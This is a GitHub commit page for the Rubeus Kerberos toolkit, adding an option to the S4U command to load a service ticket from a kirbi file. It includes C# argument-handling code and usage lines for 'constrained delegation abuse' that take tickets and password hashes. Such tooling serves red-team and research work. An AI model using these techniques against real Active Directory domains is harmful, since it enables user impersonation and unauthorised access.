Skip to content
Permalink
Browse files

Support loading TGS from kirbi instead of performing S4U2Self

  • Loading branch information...
eladshamir committed Oct 24, 2018
1 parent 8549a3b commit 10689dfff3b87b268258f31271d84a76aba40da6
Showing with 233 additions and 177 deletions.
  1. +35 −5 Rubeus/Commands/S4u.cs
  2. +2 −2 Rubeus/Domain/Info.cs
  3. +196 −170 Rubeus/lib/S4U.cs
@@ -19,6 +19,7 @@ public void Execute(Dictionary<string, string> arguments)
bool ptt = false;
string dc = "";
Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial; // throwaway placeholder, changed to something valid
KRB_CRED tgs = null;

if (arguments.ContainsKey("/user"))
{
@@ -57,6 +58,11 @@ public void Execute(Dictionary<string, string> arguments)
}
if (arguments.ContainsKey("/impersonateuser"))
{
if (arguments.ContainsKey("/tgs"))
{
Console.WriteLine("\r\n[X] You must supply either a /impersonateuser or a /tgs, but not both.\r\n");
return;
}
targetUser = arguments["/impersonateuser"];
}

@@ -70,13 +76,37 @@ public void Execute(Dictionary<string, string> arguments)
altSname = arguments["/altservice"];
}

if (arguments.ContainsKey("/tgs"))
{
string kirbi64 = arguments["/tgs"];

if (Helpers.IsBase64String(kirbi64))
{
byte[] kirbiBytes = Convert.FromBase64String(kirbi64);
tgs = new KRB_CRED(kirbiBytes);
}
else if (File.Exists(kirbi64))
{
byte[] kirbiBytes = File.ReadAllBytes(kirbi64);
tgs = new KRB_CRED(kirbiBytes);
}
else
{
Console.WriteLine("\r\n[X] /tgs:X must either be a .kirbi file or a base64 encoded .kirbi\r\n");
return;
}

targetUser = tgs.enc_part.ticket_info[0].pname.name_string[0];
}

if (String.IsNullOrEmpty(domain))
{
domain = System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;
}
if (String.IsNullOrEmpty(targetUser))
if (String.IsNullOrEmpty(targetUser) && tgs == null)
{
Console.WriteLine("\r\n[X] You must supply a /impersonateuser to impersonate!\r\n");
Console.WriteLine("\r\n[X] You must supply a /tgs to impersonate!\r\n");
Console.WriteLine("[X] Alternatively, supply a /impersonateuser to perform S4U2Self first.\r\n");
return;
}
if (String.IsNullOrEmpty(targetSPN))
@@ -93,13 +123,13 @@ public void Execute(Dictionary<string, string> arguments)
{
byte[] kirbiBytes = Convert.FromBase64String(kirbi64);
KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
S4U.Execute(kirbi, targetUser, targetSPN, ptt, dc, altSname);
S4U.Execute(kirbi, targetUser, targetSPN, ptt, dc, altSname, tgs);
}
else if (File.Exists(kirbi64))
{
byte[] kirbiBytes = File.ReadAllBytes(kirbi64);
KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
S4U.Execute(kirbi, targetUser, targetSPN, ptt, dc, altSname);
S4U.Execute(kirbi, targetUser, targetSPN, ptt, dc, altSname, tgs);
}
else
{
@@ -119,7 +149,7 @@ public void Execute(Dictionary<string, string> arguments)
return;
}

S4U.Execute(user, domain, hash, encType, targetUser, targetSPN, ptt, dc, altSname);
S4U.Execute(user, domain, hash, encType, targetUser, targetSPN, ptt, dc, altSname, tgs);
return;
}
else
@@ -35,8 +35,8 @@ public static void ShowUsage()
Console.WriteLine(" Rubeus.exe changepw </ticket:BASE64 | /ticket:FILE.KIRBI> /new:PASSWORD [/dc:DOMAIN_CONTROLLER]");

Console.WriteLine("\r\n Perform S4U constrained delegation abuse:");
Console.WriteLine(" Rubeus.exe s4u </ticket:BASE64 | /ticket:FILE.KIRBI> /impersonateuser:USER /msdsspn:SERVICE/SERVER [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/ptt]");
Console.WriteLine(" Rubeus.exe s4u /user:USER </rc4:HASH | /aes256:HASH> [/domain:DOMAIN] /impersonateuser:USER /msdsspn:SERVICE/SERVER [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/ptt]");
Console.WriteLine(" Rubeus.exe s4u </ticket:BASE64 | /ticket:FILE.KIRBI> </impersonateuser:USER | /tgs:BASE64 | /tgs:FILE.KIRBI> /msdsspn:SERVICE/SERVER [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/ptt]");
Console.WriteLine(" Rubeus.exe s4u /user:USER </rc4:HASH | /aes256:HASH> [/domain:DOMAIN] </impersonateuser:USER | /tgs:BASE64 | /tgs:FILE.KIRBI> /msdsspn:SERVICE/SERVER [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/ptt]");

Console.WriteLine("\r\n Submit a TGT, optionally targeting a specific LUID (if elevated):");
Console.WriteLine(" Rubeus.exe ptt </ticket:BASE64 | /ticket:FILE.KIRBI> [/luid:LOGINID]");
Oops, something went wrong.

0 comments on commit 10689df

Please sign in to comment.
You can’t perform that action at this time.